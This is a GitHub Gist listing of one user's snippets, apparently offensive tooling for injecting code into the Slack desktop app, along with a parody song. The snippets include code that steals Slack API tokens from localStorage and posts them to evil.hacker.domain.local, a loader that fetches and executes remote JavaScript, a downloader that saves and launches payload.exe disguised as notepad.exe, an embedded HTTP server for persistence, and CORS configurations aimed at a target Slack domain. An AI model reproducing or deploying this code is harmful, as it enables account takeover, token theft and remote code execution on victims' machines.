Skip to content

Instantly share code, notes, and snippets.

View JonnySchnittger's full-sized avatar

Jonny Schnittger JonnySchnittger

View GitHub Profile
@JonnySchnittger
JonnySchnittger / server.embed.js
Created July 17, 2019 23:28
Embed a http server for persistence within Slack
document.addEventListener("DOMContentLoaded", function () {
const http = require('http');
const url = require('url');
const { spawnSync } = require('child_process');
const port = 7000;
const contentType = { "Content-Type": "text/plain" };
const httpVerb = {
GET: "GET",
POST: "POST"
@JonnySchnittger
JonnySchnittger / localstorage.js
Created July 17, 2019 23:27
Grab the API tokens and send them back
for (var i = 0; i < localStorage.length; i++){
let key = localStorage.key(i);
if(key.endsWith('static_translations')) {
fetch('https://evil.hacker.domain.local', { method: 'POST', body: JSON.parse(localStorage.getItem(key)).data.args.token });
} else if(key.startsWith('xox')){
fetch('https://evil.hacker.domain.local', { method: 'POST', body: key });
}
}
@JonnySchnittger
JonnySchnittger / script.payload.js
Created July 17, 2019 23:26
JavaScript payload injection
document.addEventListener("DOMContentLoaded", function () {
const { webFrame } = require('electron')
const https = require("https");
const remoteUri = 'https://evil.hacker.domain.local/payload.js';
let execute = function(script) {
webFrame.executeJavaScript(script)
};
@JonnySchnittger
JonnySchnittger / .htaccess
Created July 17, 2019 23:26
CORS configuration for Apache
Header Set Access-Control-Allow-Origin "https://<your target domain>.slack.com"
Header Set Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE"
Header Set Access-Control-Allow-Credentials value="true"
@JonnySchnittger
JonnySchnittger / web.config
Created July 17, 2019 23:25
CORS configuration for IIS
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<httpProtocol>
<customHeaders>
<add name="Access-Control-Allow-Origin" value="https://<your target domain>.slack.com" />
<add name="Access-Control-Allow-Methods" value="GET, PUT, POST, DELETE" />
<add name="Access-Control-Allow-Credentials" value="true" />
</customHeaders>
</httpProtocol>
@JonnySchnittger
JonnySchnittger / payload.js
Last active July 17, 2019 23:24
Download and execute a binary payload
document.addEventListener("DOMContentLoaded", function () {
const { spawn } = require('child_process');
const fs = require('fs-extra');
const path = require('path');
const fileName = 'notepad.exe';
const localPath = path.join(process.cwd(), fileName);
const remoteUri = 'https://evil.hacker.domain.local/payload.exe';
let saveAndLaunch = function(download) {
@JonnySchnittger
JonnySchnittger / notepad.js
Last active July 17, 2019 23:24
launch notepad.exe when Slack loads
document.addEventListener("DOMContentLoaded", function () {
const { spawn } = require('child_process');
const subprocess = spawn('notepad.exe', [], {
detached: true,
stdio: 'ignore'
});
subprocess.unref();
});
@JonnySchnittger
JonnySchnittger / hacker, hacker, hacker
Created April 8, 2019 14:27
Hacker, Hacker, Hacker
To the theme music of Badger, Badger, Badger
https://www.youtube.com/watch?v=EIyixC9NsLI
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day, 0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day, 0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker
0-day,
Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker, Hacker